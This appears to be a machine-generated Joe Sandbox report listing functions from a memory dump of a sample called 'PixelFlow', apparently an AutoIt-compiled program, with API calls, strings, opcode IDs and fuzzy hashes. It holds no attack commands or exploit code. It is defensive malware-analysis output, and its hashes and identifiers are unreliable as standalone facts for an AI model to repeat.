Instruction ID: 9c14c5a2b0a209be4409405213fca733ce7518c7509f1fc0139bc7b7ee77eb6f
Opcode Fuzzy Hash: 8dc7fb2dbc6b938e5149b974b5579b62c32400f6c9cbc332ce9d4611138182af
Instruction Fuzzy Hash: 42F03A32241258BFF7215F92AC0EEEF7B7DEFCAB11F00015AFA05D2950DBA01A1186B5

Function 00667658 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 0066766B
EnterCriticalSection.KERNEL32(?,?,0060C2B6,?,?), ref: 0066767C
TerminateThread.KERNEL32(00000000,000001F6,?,0060C2B6,?,?), ref: 00667689
WaitForSingleObject.KERNEL32(00000000,000003E8,?,0060C2B6,?,?), ref: 00667696

Part of subcall function 0066705D: CloseHandle.KERNEL32(00000000,?,006676A3,?,0060C2B6,?,?), ref: 00667067

InterlockedExchange.KERNEL32(?,000001F6), ref: 006676A9
LeaveCriticalSection.KERNEL32(?,?,0060C2B6,?,?), ref: 006676B0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 4a70571a843ba6ee734bfb15df287e5c8f91e1839579664446954a03c121c22e
Instruction ID: 45aeb6ebf35fc95dde7fd1ca9df1ff5bfddcfbe21e17a8a314ee892bd98c72e6
Opcode Fuzzy Hash: 4a70571a843ba6ee734bfb15df287e5c8f91e1839579664446954a03c121c22e
Instruction Fuzzy Hash: 00F05E32145611AFE7112F64EC8C9EB773FFF45701F141427F602914A0CB766911CB60

Function 0065932D Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00659338
UnloadUserProfile.USERENV(?,?), ref: 00659344
CloseHandle.KERNEL32(?), ref: 0065934D
CloseHandle.KERNEL32(?), ref: 00659355
GetProcessHeap.KERNEL32(00000000,?), ref: 0065935E
HeapFree.KERNEL32(00000000), ref: 00659365

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 00c6a47746df28ee85a164d2cd93e468ea0ae2f4dedf1fb798faf8c29b6a5680
Instruction ID: aaab13c9253b4bb8f225cfd0c631acedf012dac722106362d64148604a8800b9
Opcode Fuzzy Hash: 00c6a47746df28ee85a164d2cd93e468ea0ae2f4dedf1fb798faf8c29b6a5680
Instruction Fuzzy Hash: E2E0527A104506BFEB411FE5EC0C95ABB6EFF49722B505622F21995870CB32A461DB50

Function 00678A9F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00678AC5
CharUpperBuffW.USER32(?,?), ref: 00678BD4
VariantClear.OLEAUT32(?), ref: 00678D4C

Part of subcall function 0066798A: VariantInit.OLEAUT32(00000000), ref: 006679CA
Part of subcall function 0066798A: VariantCopy.OLEAUT32(00000000,?), ref: 006679D3
Part of subcall function 0066798A: VariantClear.OLEAUT32(00000000), ref: 006679DF

Strings

AUTOIT.ERROR, xrefs: 00678BDA
Incorrect Parameter format, xrefs: 00678AFD, 00678CBF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: e6ed183945dd1864245f5e03cc170ee9b2adb9771304de0a90e0f563a2050fa7
Instruction ID: f1457db7588cf3a5e1dd7b3793c10383dc9f096112ee832afe8fc90355a7ca41
Opcode Fuzzy Hash: e6ed183945dd1864245f5e03cc170ee9b2adb9771304de0a90e0f563a2050fa7
Instruction Fuzzy Hash: 1191AF706443019FC714DF24C48499BBBE6EF89754F14891EF98A8B3A1DB31ED46CB92

Function 006630AA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0061436A: _wcscpy.LIBCMT ref: 0061438D

_memset.LIBCMT ref: 0066319B
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006631CA
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0066327D
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006632AB

Strings

0, xrefs: 00663187

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: beec726ec53dc4652c36d4ee1db7cc5a292f64b1973a88ae9a9b1130427ec51f
Instruction ID: 2d978d039126aaf94469f178e2dee5b77d8361bac200bd5e0e28edbb5f46c381
Opcode Fuzzy Hash: beec726ec53dc4652c36d4ee1db7cc5a292f64b1973a88ae9a9b1130427ec51f
Instruction Fuzzy Hash: 1A51E0316083209BD714DF28D850AABBBEAEF46354F040A2DF89197391DB70CF048B96

Function 0068DC66 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,006787D6,?,00000000), ref: 0068DCCE
SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,006787D6,?,00000000,00000000), ref: 0068DD04
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0068DD15
SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,006787D6,?,00000000,00000000), ref: 0068DD97

Strings

DllGetClassObject, xrefs: 0068DD0A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 550cb66b856c3427e8338fba0b20a178f0174fedc299862c1bc0a1a0fc813f1b
Instruction ID: 425f814eebefd998983bcbdcb9b2b66bb1cdb2634123b16057037a48d6bf3a2c
Opcode Fuzzy Hash: 550cb66b856c3427e8338fba0b20a178f0174fedc299862c1bc0a1a0fc813f1b
Instruction Fuzzy Hash: 29418DB1600205EFDB15EF64C984AAA7BBAEF45310F1482ADED059F285D7B1DA40CBB0

Function 00662D66 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662DD3
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00662DEF
DeleteMenu.USER32(?,00000007,00000000), ref: 00662E35
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C6890,00000000), ref: 00662E7E

Strings

0, xrefs: 00662DC8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 61f5d251d9ef1f8e8b6bcf351e945009480d597e62a113c000e4d44084c45130
Instruction ID: 3f8a6f028710ed758e17a1b60e5fff8a86c3f6517b543b52eaa0a15e0fdcfd55
Opcode Fuzzy Hash: 61f5d251d9ef1f8e8b6bcf351e945009480d597e62a113c000e4d44084c45130
Instruction Fuzzy Hash: 9741BF30204702AFDB24DF24C8A4B5AB7FAAF89310F04462EF965973D1D731E905CB66

Function 0067DC56 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067DC76

Part of subcall function 00611462: _memmove.LIBCMT ref: 006114B0

Strings

winapi, xrefs: 0067DCE7
none, xrefs: 0067DD51
stdcall, xrefs: 0067DCF8
cdecl, xrefs: 0067DCCD

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: b9fac4e5f956297c60fd0205f7f5beaeb72ef8e9e3ff6a31b33175680e2107bd
Instruction ID: cd65061919d51473b83a20ac42189dd32a865988d5f4df959e573b339efd7772
Opcode Fuzzy Hash: b9fac4e5f956297c60fd0205f7f5beaeb72ef8e9e3ff6a31b33175680e2107bd
Instruction Fuzzy Hash: 1131A3B0600619AFCF10DF54C8418FEB7BAFF55310B108A2EE929A77D1DB71A945CB84

Function 0065982B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 0065B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0065B5A0

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006598AF
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006598C2
SendMessageW.USER32(?,00000189,?,00000000), ref: 006598F2

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Strings

ComboBox, xrefs: 00659839
ListBox, xrefs: 0065986E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 4ac5301f525468995f2f8ac026725648f518e0e2250a3727639921daeefc22cd
Instruction ID: be2330b409bd558d6a268368a3d4c6f571d0d9df5dcca0cc8ce923e195a6d39e
Opcode Fuzzy Hash: 4ac5301f525468995f2f8ac026725648f518e0e2250a3727639921daeefc22cd
Instruction Fuzzy Hash: 0021F671940104AEDB54ABA0DC46CFEB76FDF42360F14411EFD21972E1DB35494AD764

Function 00671CDD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00671CFC
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671D22
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00671D52
InternetCloseHandle.WININET(00000000), ref: 00671D99

Part of subcall function 00672933: GetLastError.KERNEL32(?,?,00671CC7,00000000,00000000,00000001), ref: 00672948
Part of subcall function 00672933: SetEvent.KERNEL32(?,?,00671CC7,00000000,00000000,00000001), ref: 0067295D

Strings

, xrefs: 00671D43

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 170dc37a7929845b2238dd246bc8b659b481c5f76a1da94ea6785327a12d77fb
Instruction ID: 1542d7b9c59728fb36ddaf67ff8fc4bed1bdbe2e4cc40ed37c6d2cb750f40e6e
Opcode Fuzzy Hash: 170dc37a7929845b2238dd246bc8b659b481c5f76a1da94ea6785327a12d77fb
Instruction Fuzzy Hash: 9F21CF71500208BFE7219F68CC95EFF76FEEF49754F10811BF509AA240EB609D059BA4

Function 006867D4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00602111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0060214F
Part of subcall function 00602111: GetStockObject.GDI32(00000011), ref: 00602163
Part of subcall function 00602111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0060216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0068684E
LoadLibraryW.KERNEL32(?), ref: 00686855
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0068686A
DestroyWindow.USER32(?), ref: 00686872

Strings

SysAnimate32, xrefs: 00686829

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 664fff4f308f6fa9cd85eff5c12666f131ce6f7f1f5b5a97bcaecdf27b55e6aa
Instruction ID: 458e92103acd6ddda28d9dc02bd89572bda354f833ff025f315197dc30dedf95
Opcode Fuzzy Hash: 664fff4f308f6fa9cd85eff5c12666f131ce6f7f1f5b5a97bcaecdf27b55e6aa
Instruction Fuzzy Hash: FB2177B1600206AFEF106E64DC90EFB77AEEF59328F104729FA58962A0D771CC919760

Function 006671C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 006671E4
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00667217
GetStdHandle.KERNEL32(0000000C), ref: 00667229
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00667263

Strings

nul, xrefs: 0066725E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 5abfb300aa346ac811abc9966722e2a9d43a8e1e152be6bea57207004c4eb29f
Instruction ID: f07f68f838bb7272f26040a58c0b42431adc9d3159bfa8131d19c68793cd183c
Opcode Fuzzy Hash: 5abfb300aa346ac811abc9966722e2a9d43a8e1e152be6bea57207004c4eb29f
Instruction Fuzzy Hash: E221A471504306AFDB209F69DC04A9AB7FAAF85728F24461AFCA0D72D0D7709941CB60

Function 00667292 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 006672B1
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006672E3
GetStdHandle.KERNEL32(000000F6), ref: 006672F4
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 0066732E

Strings

nul, xrefs: 00667329

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: fc93e3b22be3e3074d8405f072e4cd90d702bcdcbbe05445484735e807f43365
Instruction ID: 1c232e89e099bdb54425b6b7c097c33a5343a57c1d7cf2bb50ad4beda956fbdb
Opcode Fuzzy Hash: fc93e3b22be3e3074d8405f072e4cd90d702bcdcbbe05445484735e807f43365
Instruction Fuzzy Hash: 2821A171508305ABDB209F689C04A9977EEAF55738F200B1AFCA0E33D0DB70D940CB61

Function 0066B0F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066B104
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066B158
__swprintf.LIBCMT ref: 0066B171
SetErrorMode.KERNEL32(00000000,00000001,00000000,00690980), ref: 0066B1AF

Strings

%lu, xrefs: 0066B16B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 4bbae5aa2d0ccba553ad5b70f782b25643a078be6765d78421478013b17eb93f
Instruction ID: 716f30407d930c0a9129dd70fed4c51332ac592bf3ab7fde8397a61cdfd5daae
Opcode Fuzzy Hash: 4bbae5aa2d0ccba553ad5b70f782b25643a078be6765d78421478013b17eb93f
Instruction Fuzzy Hash: 2A217174A00109AFCB50EF64C985DAEB7BAEF89304B108069F905DB291DB31EA45CB65

Function 0065A9E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Part of subcall function 0065A835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065A852
Part of subcall function 0065A835: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A865
Part of subcall function 0065A835: GetCurrentThreadId.KERNEL32 ref: 0065A86C
Part of subcall function 0065A835: AttachThreadInput.USER32(00000000), ref: 0065A873

GetFocus.USER32 ref: 0065AA0D

Part of subcall function 0065A87E: GetParent.USER32(?), ref: 0065A88C

GetClassNameW.USER32(?,?,00000100), ref: 0065AA56
EnumChildWindows.USER32(?,0065AACE), ref: 0065AA7E
__swprintf.LIBCMT ref: 0065AA98

Strings

%s%d, xrefs: 0065AA92

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: d12f78f99a627b334a4890baa7a02bc60999edb8197b403800eb315af63e470e
Instruction ID: 529015f74e994fe7494f6c3a5a12a0c3d2d94567978961bf2b954718b0aa2bc8
Opcode Fuzzy Hash: d12f78f99a627b334a4890baa7a02bc60999edb8197b403800eb315af63e470e
Instruction Fuzzy Hash: E511A271600209AFEF91BFA0CD85FEA376EAB44701F04416ABE08AA142DA705949CB75

Function 00662153 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00662184

Strings

APPEND, xrefs: 006621BD
EXISTS, xrefs: 006621AC
KEYS, xrefs: 0066219B
REMOVE, xrefs: 0066218A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: a1b187a747770608214fd762a3866163460954d3fbcaa3738782a8a498add94e
Instruction ID: d45f6d8aab5945798139ca92eda1a57cb84a71d0e52805af0fa89a51767525e3
Opcode Fuzzy Hash: a1b187a747770608214fd762a3866163460954d3fbcaa3738782a8a498add94e
Instruction Fuzzy Hash: 1811CBB0A001199F8F04EF60D8618FEB7B6FF26304B408468EA25A7353DB325D46CF50

Function 0067F006 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0067F0B8
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0067F0E8
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0067F21B
CloseHandle.KERNEL32(?), ref: 0067F29C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: cf4f6ca226b06f8827f53efbcd537f2327714ff4d717119482446a6f73ed452f
Instruction ID: 5d7031fc1173aa6d6ce31d42629f6509aa35f74f9a2f8c2a1373c42657e05587
Opcode Fuzzy Hash: cf4f6ca226b06f8827f53efbcd537f2327714ff4d717119482446a6f73ed452f
Instruction Fuzzy Hash: 678190B16403019FD764DF68D842F6BB7E6AF44710F04891DFA999B3D2DBB0AD008B95

